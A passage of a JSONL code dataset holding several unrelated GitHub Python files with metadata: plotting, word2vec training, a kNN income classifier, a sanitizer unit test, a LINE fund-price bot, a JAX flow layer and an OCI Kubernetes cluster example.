'results/lstm-attention/answer.txt', 'w', encoding='utf-8') as \r\n\r\nif __name__ == \"__main__\":\r\n # **************** lstm **********************\r\n #convert_to_competition_format('results/lstm-attention', 'attention_test_results')\r\n # **************** transformers **************\r\n convert_to_competition_format('results/transformers', 'transformers_test_results_17.39')", "repo_name": "roslan22/FromNaturalLanguageToCode", "sub_path": "eval/convert_to_competition_json.py", "file_name": "convert_to_competition_json.py", "file_ext": "py", "file_size_in_byte": 1441, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.join", "line_number": 6, "usage_type": "call"}, {"api_name": "os.path", "line_number": 6, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 6, "usage_type": "call"}, {"api_name": "util.encoded_code_tokens_to_code_sl", "line_number": 17, "usage_type": "call"}, {"api_name": "json.load", "line_number": 25, "usage_type": "call"}]} +{"seq_id": "15522129807", "text": "import matplotlib.pyplot as plt\nimport numpy as np\nimport pandas as pd\n\n# fig = plt.figure()\n# ax = fig.add_subplot(3, 3, 1)\n# ax2 = fig.add_subplot(3, 3, 2)\n# rect = plt.Rectangle((0.2, 0.75), 0.4, 0.15, color='r', alpha=0.3)\n# circ = plt.Circle((0.7, 0.2),0.15, color='b', alpha=0.3)\n# ax.add_patch(rect)\n# ax2.add_patch(circ)\n# plt.show()\n\n# -----------------------------\n# a = np.arange(10)\n# print(a)\n#\n# plt.xlabel('X')\n# plt.ylabel('Y')\n# plt.plot(a, a * 1.5, a, a * 2.5, a, a * 3.5, a, a * 4.5)\n# plt.legend(['1.5x', '2.5x', '3.5x', '4.5x'])\n# plt.show()\n# -----------------------------\n\n# x = np.linspace(-10, 10, 100)\n# print(x)\n# y = np.sin(x)\n# print(y)\n# plt.plot(x, y, marker=\"o\")\n# plt.show()\n# -----------------------------\ndf = pd.read_csv('../datas/iris.csv', header=None)\nX = df.iloc[:, [0, 2]].values\n# print(X)\n\nplt.scatter(X[:50, 0], X[:50, 1], color='red', marker='o', label='setosa')\nplt.scatter(X[50:100, 0], X[50:100, 1], color='blue', marker='x', label='versicolor')\nplt.scatter(X[100:, 0], X[100:, 1], color='green', marker='+', label='Virginica')\nplt.xlabel('Sepal.Length')\nplt.ylabel('Sepal.Width')\nplt.legend(loc=2)\nplt.show()\n", "repo_name": "changesmile/Machine", "sub_path": "机器学习/3章/花鸟.py", "file_name": "花鸟.py", "file_ext": "py", "file_size_in_byte": 1158, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.read_csv", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.scatter", "line_number": 38, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 38, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 39, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 39, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 40, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 40, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 41, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 41, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 42, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 42, "usage_type": "name"}]} +{"seq_id": "11081020512", "text": "import multiprocessing as mp\nimport re\nimport time\nfrom pathlib import Path\n\nimport gensim\nimport MeCab\n\n\ndef get_file_path():\n \"\"\"\n 固有名詞のdfのpathのリスト\n \"\"\"\n p = Path(__file__).parent.resolve() / \"..\" / \"toots_log\"\n file_paths = sorted([f for f in p.iterdir() if f.is_file()])\n return file_paths\n\n\ndef read_files(file_paths):\n text = \"\"\n for file_path in file_paths:\n with open(file_path, \"r\") as f:\n text += f.read()\n text += \"\\n\"\n text = re.sub(r\":[a-zA-Z0-9_-]+:\", \"\", text)\n text = re.sub(\" \", \"\\n\", text)\n return text\n\n\ndef wakachi(text):\n # corpus = [[word,word,word],[word,word,word,word],,,]\n m = MeCab.Tagger(\"-d /usr/lib/mecab/dic/mecab-ipadic-neologd\")\n corpus = [\n [word.split(\"\\t\")[0] for word in m.parse(sentence).splitlines() if word != \"EOS\"]\n for sentence in text.splitlines()\n ]\n return corpus\n\n\nif __name__ == \"__main__\":\n file_paths = get_file_path()\n print(len(file_paths))\n text = read_files(file_paths)\n print(\"corpus作成\")\n corpus = wakachi(text)\n print(len(corpus))\n print(\"学習始め\")\n model = gensim.models.word2vec.Word2Vec(\n corpus, size=60, window=8, min_count=5, workers=mp.cpu_count(), sg=1, iter=6\n )\n print(\"学習終了, 保存\")\n print(\"vocab: {}語\".format(len(model.wv.vocab)))\n model.save(str(Path(__file__).parent.resolve() / \"word2vec.gensim.model\"))\n print(\"---保存完了---\")\n", "repo_name": "kelvin27315/mastodon-wordcloud", "sub_path": "src/w2v/train.py", "file_name": "train.py", "file_ext": "py", "file_size_in_byte": 1481, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pathlib.Path", "line_number": 14, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 25, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 26, "usage_type": "call"}, {"api_name": "MeCab.Tagger", "line_number": 32, "usage_type": "call"}, {"api_name": "gensim.models.word2vec.Word2Vec", "line_number": 48, "usage_type": "call"}, {"api_name": "gensim.models", "line_number": 48, "usage_type": "attribute"}, {"api_name": "multiprocessing.cpu_count", "line_number": 49, "usage_type": "call"}, {"api_name": "pathlib.Path", "line_number": 53, "usage_type": "call"}]} +{"seq_id": "19323298957", "text": "import pandas as pd\r\nimport seaborn as sns\r\nimport matplotlib.pyplot as ppt\r\nimport numpy as np\r\nimport copy\r\n\r\nfrom sklearn import preprocessing\r\nfrom sklearn.model_selection import train_test_split\r\nfrom sklearn.neighbors import KNeighborsClassifier\r\nfrom sklearn import metrics\r\n\r\n\r\nclass Constants:\r\n MAX_NUMBER_OF_SUBPLOTS = 5\r\n GENDER = {'Female': 1, 'Male': 2}\r\n\r\n\r\ndef unknownCount(data: pd.DataFrame) -> dict:\r\n unknown = dict()\r\n for column in data:\r\n unknown[column] = data[data[column] == '?'].shape[0]\r\n return unknown\r\n\r\n\r\ndef clearData(data: pd.DataFrame):\r\n data['income'] = data['income'].apply(lambda value: int(value == '>50K'))\r\n data.replace('?', np.NaN)\r\n\r\ndef analyzeIncomeByEducationAndHoursPerWeek(data: pd.DataFrame):\r\n income_data = data.groupby(['education', 'hours-per-week'])['income'].mean().to_frame()\r\n income_data['income'] = income_data['income'] * 100 # convert to percents\r\n income_data = income_data.reset_index(level=[0, 1])\r\n educations = income_data['education'].unique()\r\n educations_number = educations.shape[0]\r\n offset = 0\r\n if educations_number > Constants.MAX_NUMBER_OF_SUBPLOTS:\r\n while educations_number != 0:\r\n subplots_number = min(educations_number, Constants.MAX_NUMBER_OF_SUBPLOTS)\r\n createEducationData(income_data, educations, subplots_number, offset)\r\n offset += subplots_number\r\n educations_number -= subplots_number\r\n else:\r\n createEducationData(income_data, educations, educations_number, 0)\r\n\r\n\r\ndef createEducationData(income_data, educations, subplots_number, subplots_offset):\r\n _, axes = ppt.subplots(subplots_number, constrained_layout=True)\r\n education_offset = 0\r\n index = 0\r\n for value in educations:\r\n if index == subplots_number:\r\n break\r\n\r\n if education_offset < subplots_offset:\r\n education_offset += 1\r\n continue\r\n\r\n education_data = income_data[income_data['education'] == value]\r\n if subplots_number == 1:\r\n createSingleGraph(axes,\r\n education_data['hours-per-week'],\r\n education_data['income'],\r\n 'hours-per-week',\r\n 'normalized income',\r\n value)\r\n break\r\n\r\n createSingleGraph(axes[index],\r\n education_data['hours-per-week'],\r\n education_data['income'],\r\n 'hours-per-week',\r\n 'normalized income',\r\n value)\r\n index += 1\r\n ppt.show()\r\n\r\n\r\ndef analyzeIncomeByGender(data: pd.DataFrame):\r\n income_data = data.groupby('gender')['income'].mean().to_frame()\r\n income_data['income'] = income_data['income'] * 100\r\n bins = ['Female', 'Male']\r\n values = [income_data.loc['Female', 'income'], income_data.loc['Male', 'income']]\r\n ppt.bar(bins, values)\r\n ppt.title(\"Income by gender\")\r\n ppt.ylabel(\"Income (percents)\")\r\n ppt.show()\r\n\r\n\r\ndef createSingleGraph(ax, x, y, xlabel, ylabel, title):\r\n ax.plot(x, y)\r\n ax.plot(x, y)\r\n ax.set_xlabel(xlabel)\r\n ax.set_ylabel(ylabel)\r\n ax.set_title(title, loc='right')\r\n\r\n\r\ndef indexing(filename) -> dict:\r\n file = open(filename, 'r')\r\n result = dict()\r\n index = 0\r\n for line in file:\r\n result[line.rstrip('\\n')] = index\r\n index += 1\r\n return result\r\n\r\n\r\n\r\n\r\ndef replaceTextualData(data, filename=None) -> pd.DataFrame:\r\n clone = copy.deepcopy(data)\r\n\r\n columns = clone.columns\r\n if \"education\" in columns:\r\n education = indexing(\"./data/education.txt\")\r\n clone[\"education\"] = [education[item] for item in clone[\"education\"]]\r\n\r\n if \"marital-status\" in columns:\r\n marital_status = indexing(\"./data/marital-status.txt\")\r\n clone[\"marital-status\"] = [marital_status[item] for item in clone[\"marital-status\"]]\r\n\r\n if \"native-country\" in columns:\r\n native_country = indexing(\"./data/native-country.txt\")\r\n clone[\"native-country\"] = [native_country[item] for item in clone[\"native-country\"]]\r\n\r\n if \"occupation\" in columns:\r\n occupation = indexing(\"./data/occupation.txt\")\r\n clone[\"occupation\"] = [occupation[item] for item in clone[\"occupation\"]]\r\n\r\n if \"race\" in columns:\r\n race = indexing(\"./data/race.txt\")\r\n clone[\"race\"] = [race[item] for item in clone[\"race\"]]\r\n\r\n if \"relationship\" in columns:\r\n relationship = indexing(\"./data/relationship.txt\")\r\n clone[\"relationship\"] = [relationship[item] for item in clone[\"relationship\"]]\r\n\r\n if \"workclass\" in columns:\r\n workclass = indexing(\"./data/workclass.txt\")\r\n clone[\"workclass\"] = [workclass[item] for item in clone[\"workclass\"]]\r\n\r\n return clone\r\n\r\n\r\ndef createHistogram(data):\r\n data.hist()\r\n ppt.show()\r\n\r\n\r\ndef excludeColumnsAndCreateCorrTable(data):\r\n data = data.drop(columns=['marital-status', 'educational-num', 'fnlwgt', 'capital-gain', 'capital-loss'])\r\n return data\r\n\r\n\r\ndef arrayToString(array):\r\n result = \"\"\r\n size = len(array)\r\n for index in range(size - 1):\r\n result += str(array[index]) + \", \"\r\n result += str(array[size - 1])\r\n return result\r\n\r\n\r\n# модель классификации. В качестве алгоритма классификации выбран алгоритм KNN \r\ndef kNN(data, max_number_of_neighbours=None):\r\n # splitting data\r\n textual_data = data.select_dtypes(include='object')\r\n numeric_data = data.select_dtypes(exclude='object')\r\n\r\n textual_data = pd.get_dummies(textual_data)\r\n\r\n\r\n # remove income column from numeric data and scaling data\r\n income = numeric_data['income']\r\n factors = numeric_data.drop(columns='income')\r\n scaler = preprocessing.StandardScaler()\r\n std_factors = pd.DataFrame(scaler.fit_transform(factors))\r\n std_factors.columns = factors.columns\r\n\r\n # adding classification properties and splitting data to train and test\r\n train_data = pd.concat([std_factors, textual_data], axis=1)\r\n train, test, train_result, test_result = train_test_split(train_data, income, test_size=0.3,\r\n random_state=1)\r\n\r\n # learn model, predict values and record prediction accuracy\r\n predicted = learnModel(train, train_result, test)\r\n\r\n if max_number_of_neighbours is not None:\r\n mean_acc = np.zeros((max_number_of_neighbours - 1))\r\n std_acc = np.zeros((max_number_of_neighbours - 1))\r\n\r\n for neighbours_count in range(1, max_number_of_neighbours):\r\n predicted = learnModel(train, train_result, test, neighbours_count)\r\n mean_acc[neighbours_count - 1] = metrics.accuracy_score(test_result, predicted)\r\n std_acc[neighbours_count - 1] = np.std(predicted == test_result) / np.sqrt(predicted.shape[0])\r\n\r\n # create plot for statistics\r\n ppt.plot(range(1, max_number_of_neighbours), mean_acc, marker='o')\r\n ppt.legend(('Accuracy '))\r\n ppt.ylabel('Accuracy ')\r\n ppt.xlabel('Number of Neighbors (K)')\r\n ppt.tight_layout()\r\n ppt.show()\r\n\r\n\r\ndef learnModel(train, train_result, test, number_of_neighbours=5):\r\n neigh = KNeighborsClassifier(n_neighbors=number_of_neighbours).fit(train, train_result)\r\n return neigh.predict(test)\r\n\r\n\r\ndata = pd.read_csv('adult.csv')\r\nprint(data.head())\r\nprint('------------------------------------ АНАЛИЗ ------------------------------------')\r\nprint('Количество ячеек, содержащих неизвестные значения (знак ?)')\r\nprint(unknownCount(data))\r\ncreateHistogram(data)\r\nclearData(data)\r\nanalyzeIncomeByEducationAndHoursPerWeek(data)\r\nanalyzeIncomeByGender(data)\r\nclone = replaceTextualData(data)\r\ndata = excludeColumnsAndCreateCorrTable(data)\r\nkNN(data, 25)\r\n", "repo_name": "NinjaCaratist/metrology_lab45", "sub_path": "main.py", "file_name": "main.py", "file_ext": "py", "file_size_in_byte": 7979, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pandas.DataFrame", "line_number": 18, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 25, "usage_type": "attribute"}, {"api_name": "numpy.NaN", "line_number": 27, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 29, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.subplots", "line_number": 47, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 47, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 75, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 75, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 78, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.bar", "line_number": 83, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 83, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.title", "line_number": 84, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 84, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 85, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 85, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 86, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 86, "usage_type": "name"}, {"api_name": "copy.deepcopy", "line_number": 110, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 109, "usage_type": "attribute"}, {"api_name": "matplotlib.pyplot.show", "line_number": 146, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 146, "usage_type": "name"}, {"api_name": "pandas.get_dummies", "line_number": 169, "usage_type": "call"}, {"api_name": "sklearn.preprocessing.StandardScaler", "line_number": 175, "usage_type": "call"}, {"api_name": "sklearn.preprocessing", "line_number": 175, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 176, "usage_type": "call"}, {"api_name": "pandas.concat", "line_number": 180, "usage_type": "call"}, {"api_name": "sklearn.model_selection.train_test_split", "line_number": 181, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 188, "usage_type": "call"}, {"api_name": "numpy.zeros", "line_number": 189, "usage_type": "call"}, {"api_name": "sklearn.metrics.accuracy_score", "line_number": 193, "usage_type": "call"}, {"api_name": "sklearn.metrics", "line_number": 193, "usage_type": "name"}, {"api_name": "numpy.std", "line_number": 194, "usage_type": "call"}, {"api_name": "numpy.sqrt", "line_number": 194, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.plot", "line_number": 197, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 197, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.legend", "line_number": 198, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 198, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.ylabel", "line_number": 199, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 199, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.xlabel", "line_number": 200, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 200, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.tight_layout", "line_number": 201, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 201, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.show", "line_number": 202, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 202, "usage_type": "name"}, {"api_name": "sklearn.neighbors.KNeighborsClassifier", "line_number": 206, "usage_type": "call"}, {"api_name": "pandas.read_csv", "line_number": 210, "usage_type": "call"}]} +{"seq_id": "36373745599", "text": "# External Libraries\nimport pytest\n\n# VerdanTech Source\nfrom src.utils.sanitizers.basic.ban import BanSpec, BanSpecConfig, BanSpecParams\n\npytestmark = [pytest.mark.unit]\n\n\nclass TestBanSpec:\n # ======================================\n # BanSpec._sanitize() tests\n # ======================================\n\n @pytest.mark.parametrize(\n [\n \"input_data\",\n \"params\",\n \"case_sensitive\",\n \"expected_output\",\n ],\n [\n # Test case: float not in banned_inputs returns true\n (0.5, BanSpecParams(banned_inputs=[0.1, 0.2, 0.3]), False, True),\n # Test case: float in banned_inputs returns false\n (0.5, BanSpecParams(banned_inputs=[0.1, 0.2, 0.5]), False, False),\n # Test case: str not in banned_inputs returns true\n (\"str\", BanSpecParams(banned_inputs=[\"str1\", \"str2\"]), False, True),\n # Test case: str in banned_inputs returns false\n (\"str\", BanSpecParams(banned_inputs=[\"str1\", \"str\"]), False, False),\n # Test case: str in banned_inputs\n # with case_sensitive = True\n # returns True\n (\"sTr\", BanSpecParams(banned_inputs=[\"str\"]), True, True),\n # Test case: str in normalized(banned_inputs)\n # with case_sensitive = False\n # returns false\n (\"sTr\", BanSpecParams(banned_inputs=[\"str\"]), False, False),\n ],\n )\n def test_ban_spec_minimum_bound(\n self,\n input_data: str,\n params: BanSpecParams,\n case_sensitive: bool,\n expected_output: bool,\n ):\n \"\"\"\n Ensure the inner sanitization logic rejects inputs with lengths\n greater than params.min.\n\n Args:\n input_data (Real): the input to test validation on.\n params (LengthSpecParams): the min and max values\n to use for validation.\n case_sensitive (bool): the value of BanSpecConfig.case_sensitive\n to set on the BanSpec under test.\n expected_output (bool): the expected result of the validation.\n \"\"\"\n config = BanSpecConfig(\n params=params, error_message=\"\", case_sensitive=case_sensitive\n )\n spec = BanSpec(config=config)\n assert spec._sanitize(input_data=input_data) == expected_output\n", "repo_name": "nathanielarking/VerdanTech", "sub_path": "tests/utils/sanitizers/basic/ban_test.py", "file_name": "ban_test.py", "file_ext": "py", "file_size_in_byte": 2369, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "pytest.mark", "line_number": 7, "usage_type": "attribute"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpecParams", "line_number": 44, "usage_type": "name"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpecConfig", "line_number": 60, "usage_type": "call"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpec", "line_number": 63, "usage_type": "call"}, {"api_name": "pytest.mark.parametrize", "line_number": 15, "usage_type": "call"}, {"api_name": "pytest.mark", "line_number": 15, "usage_type": "attribute"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpecParams", "line_number": 24, "usage_type": "call"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpecParams", "line_number": 26, "usage_type": "call"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpecParams", "line_number": 28, "usage_type": "call"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpecParams", "line_number": 30, "usage_type": "call"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpecParams", "line_number": 34, "usage_type": "call"}, {"api_name": "src.utils.sanitizers.basic.ban.BanSpecParams", "line_number": 38, "usage_type": "call"}]} +{"seq_id": "33089508279", "text": "import requests\nimport json\nimport re\nimport time\n\n# fund codes array As target data\nfund_codes = [\n \"161725\",\n \"320007\",\n \"260108\",\n \"001938\",\n \"003096\",\n \"006408\",\n \"003834\",\n \"001838\",\n \"519674\",\n]\n\n# line channel access token\naccess_token = ''\n\n# message for send to line\nmessage = \"\"\n\nfor code in fund_codes:\n # request URL from https://fund.eastmoney.com/\n fund_url = \"http://fundgz.1234567.com.cn/js/%s.js\" % code\n # http request header\n headers = {\n 'content-type':\n 'application/json',\n 'User-Agent':\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.190 Safari/537.36'\n }\n # send request\n r = requests.get(url=fund_url, headers=headers)\n # returned body\n content = r.text\n # regexp\n pattern = r'^jsonpgz\\((.*)\\)'\n # format response\n search = re.findall(pattern, content)\n # get fund data from array\n for i in search:\n data = json.loads(i)\n if float(data['gszzl']) > 0:\n message += (\"{}: {}%⬆️\\n\".format(data['name'], data['gszzl']))\n elif float(data['gszzl']) < 0:\n message += (\"{}: {}%⬇️\\n\".format(data['name'], data['gszzl']))\n else:\n message += (\"{}: {}%\\n\".format(data['name'], data['gszzl']))\n\n# line messaging api url\nline_url = 'https://api.line.me/v2/bot/message/broadcast'\n# line request header\nline_headers = {\n 'Authorization': 'Bearer ' + access_token,\n 'Content-Type': 'application/json'\n}\n\n# define message in json format\nmessage_list = {'messages': [{'type': 'text', 'text': message[:-1]}]}\n\n# encode to json\nmessage_data = json.dumps(message_list)\n# post message request\nresponse = requests.post(url=line_url, headers=line_headers, data=message_data)\n\nprint(time.strftime(\"%Y-%m-%d %H:%M:%S\", time.localtime()))\nprint(response)\n", "repo_name": "peepa857/wechat-fund", "sub_path": "linebot.py", "file_name": "linebot.py", "file_ext": "py", "file_size_in_byte": 1879, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "52", "api": [{"api_name": "requests.get", "line_number": 36, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 42, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 45, "usage_type": "call"}, {"api_name": "json.dumps", "line_number": 65, "usage_type": "call"}, {"api_name": "requests.post", "line_number": 67, "usage_type": "call"}, {"api_name": "time.strftime", "line_number": 69, "usage_type": "call"}, {"api_name": "time.localtime", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "19314190526", "text": "import distrax\nimport haiku as hk\nfrom chex import Array\nfrom jax import numpy as jnp\n\nfrom surjectors.bijectors.masked_autoregressive import MaskedAutoregressive\nfrom surjectors.surjectors.funnel import Funnel\nfrom surjectors.util import unstack\n\n\nclass AffineMaskedAutoregressiveInferenceFunnel(Funnel):\n \"\"\"\n Inference funnel layer using masked affine autoregression\n \"\"\"\n\n def __init__(self, n_keep, decoder, conditioner):\n super().__init__(\n n_keep, decoder, conditioner, None, \"inference_surjector\"\n )\n\n def _inner_bijector(self):\n def _bijector_fn(params: Array):\n shift, log_scale = unstack(params, axis=-1)\n return distrax.ScalarAffine(shift, jnp.exp(log_scale))\n\n return MaskedAutoregressive(self._conditioner, _bijector_fn)\n\n def inverse_and_likelihood_contribution(self, y, x=None, **kwargs):\n y_plus, y_minus = y[..., : self.n_keep], y[..., self.n_keep :]\n\n y_cond = y_minus\n if x is not None:\n y_cond = jnp.concatenate([y_cond, x], axis=-1)\n z, jac_det = self._inner_bijector().inverse_and_log_det(y_plus, y_cond)\n\n z_condition = z\n if x is not None:\n z_condition = jnp.concatenate([z, x], axis=-1)\n lc = self.decoder(z_condition).log_prob(y_minus)\n\n return z, lc + jac_det\n\n def forward_and_likelihood_contribution(self, z, x=None, **kwargs):\n z_condition = z\n if x is not None:\n z_condition = jnp.concatenate([z, x], axis=-1)\n y_minus, jac_det = self.decoder(z_condition).sample_and_log_prob(\n seed=hk.next_rng_key()\n )\n\n y_cond = y_minus\n if x is not None:\n y_cond = jnp.concatenate([y_cond, x], axis=-1) \n y_plus, lc = self._inner_bijector().forward_and_log_det(z, y_cond)\n\n y = jnp.concatenate([y_plus, y_minus])\n return y, lc + jac_det\n\n def forward(self, z, x=None):\n y, _ = self.forward_and_likelihood_contribution(z, x)\n return y\n", "repo_name": "dirmeier/ssnl", "sub_path": "surjectors/surjectors/surjectors/affine_masked_autoregressive_inference_funnel.py", "file_name": "affine_masked_autoregressive_inference_funnel.py", "file_ext": "py", "file_size_in_byte": 2033, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "52", "api": [{"api_name": "surjectors.surjectors.funnel.Funnel", "line_number": 11, "usage_type": "name"}, {"api_name": "chex.Array", "line_number": 22, "usage_type": "name"}, {"api_name": "surjectors.util.unstack", "line_number": 23, "usage_type": "call"}, {"api_name": "distrax.ScalarAffine", "line_number": 24, "usage_type": "call"}, {"api_name": "jax.numpy.exp", "line_number": 24, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 24, "usage_type": "name"}, {"api_name": "surjectors.bijectors.masked_autoregressive.MaskedAutoregressive", "line_number": 26, "usage_type": "call"}, {"api_name": "jax.numpy.concatenate", "line_number": 33, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 33, "usage_type": "name"}, {"api_name": "jax.numpy.concatenate", "line_number": 38, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 38, "usage_type": "name"}, {"api_name": "jax.numpy.concatenate", "line_number": 46, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 46, "usage_type": "name"}, {"api_name": "haiku.next_rng_key", "line_number": 48, "usage_type": "call"}, {"api_name": "jax.numpy.concatenate", "line_number": 53, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 53, "usage_type": "name"}, {"api_name": "jax.numpy.concatenate", "line_number": 56, "usage_type": "call"}, {"api_name": "jax.numpy", "line_number": 56, "usage_type": "name"}]} +{"seq_id": "31574271629", "text": "from __future__ import print_function\nimport oci\n\n\n# This script demonstrates some of the Container Engine operations.\n# Please review the documentation for more information about\n# how Container Engine works, including permissions needed.\n#\n# https://docs.cloud.oracle.com/Content/ContEng/Concepts/contengoverview.htm\n\n# Note: Exception handling is rudimentary and would need to be expanded for use in\n# production. Please be aware resources may need to be cleaned up manually\n# if an exception occures.\n\n# Load the default configuration\nconfig = oci.config.from_file()\n\n# This is the root compartment. You can use another compartment in your tenancy.\ncompartment_id = config[\"tenancy\"]\n\nprint(\"Compartment id: {}\".format(compartment_id))\n\n#############################\n# Container Engine operations\n#############################\n\n\ndef create_cluster(ce_client, vcn):\n \"\"\"\n create_cluster\n\n This function demonstrates the process of creating a cluster. The cidrs\n and other values are just for demonstration purposes.\n \"\"\"\n success = True\n kubernetes_network_config = oci.container_engine.models.KubernetesNetworkConfig(pods_cidr=\"10.244.0.0/16\",\n services_cidr=\"10.96.0.0/16\")\n\n cluster_create_options = oci.container_engine.models.ClusterCreateOptions(service_lb_subnet_ids=vcn['lb_subnets'],\n kubernetes_network_config=kubernetes_network_config)\n\n cluster_details = oci.container_engine.models.CreateClusterDetails(name=\"PythonSDK_cluster1\",\n compartment_id=compartment_id,\n vcn_id=vcn['id'],\n kubernetes_version=get_kubernetes_version(ce_client),\n options=cluster_create_options)\n\n ce_composite_ops = oci.container_engine.ContainerEngineClientCompositeOperations(ce_client)\n\n response = ce_composite_ops.create_cluster_and_wait_for_state(cluster_details,\n wait_for_states=[oci.container_engine.models.WorkRequest.STATUS_SUCCEEDED,\n oci.container_engine.models.WorkRequest.STATUS_FAILED])\n\n # response.data is a WorkRequestSummary\n # gather the created resources from the work request\n resources = {}\n for resource in response.data.resources:\n print(\"{}: {}\".format(resource.entity_type, resource.identifier))\n resources[resource.entity_type] = resource.identifier\n\n # If the workrequest failed, get the work request errors.\n if response.data.status == oci.container_engine.models.WorkRequest.STATUS_FAILED:\n get_work_request_errors(ce_client, compartment_id, response.data.id)\n success = False\n else:\n print(\"Create cluster succeed\")\n\n # Get the work request logs\n print_header(\"Work request logs:\")\n response = ce_client.list_work_request_logs(compartment_id, response.data.id)\n print(response.data)\n\n return success, resources\n\n\ndef update_cluster(ce_client, cluster_id):\n \"\"\"\n update_cluster\n\n Currently there are two items you can update on the cluster the name and the kubernetes version.\n This function demonstrates updating the name. Updating the kubernetes version works in\n a similar fashion.\n \"\"\"\n\n update_cluster_details = oci.container_engine.models.UpdateClusterDetails(name=\"PythonSDK_cluster_1\")\n\n ce_composite_ops = oci.container_engine.ContainerEngineClientCompositeOperations(ce_client)\n\n response = ce_composite_ops.update_cluster_and_wait_for_state(cluster_id,\n update_cluster_details,\n wait_for_states=[oci.container_engine.models.WorkRequest.STATUS_SUCCEEDED,\n oci.container_engine.models.WorkRequest.STATUS_FAILED])\n\n # If the workrequest failed, get the work request errors.\n if response.data.status == oci.container_engine.models.WorkRequest.STATUS_FAILED:\n get_work_request_errors(ce_client, compartment_id, response.data.id)\n else:\n print(\"Update cluster succeeded\")\n\n return\n\n\ndef delete_cluster(ce_client, cluster_id):\n \"\"\"\n delete_cluster\n\n Delete the clusted associated with the cluster_id passed in\n \"\"\"\n ce_composite_ops = oci.container_engine.ContainerEngineClientCompositeOperations(ce_client)\n\n response = ce_composite_ops.delete_cluster_and_wait_for_state(cluster_id,\n wait_for_states=[oci.container_engine.models.WorkRequest.STATUS_SUCCEEDED])\n\n if response.status == 200:\n print(\"Cluster deleted successfully\")\n else:\n print(\"Recieved '{}' when attempting to delete the cluster\".format(response.status))\n\n return\n\n\ndef 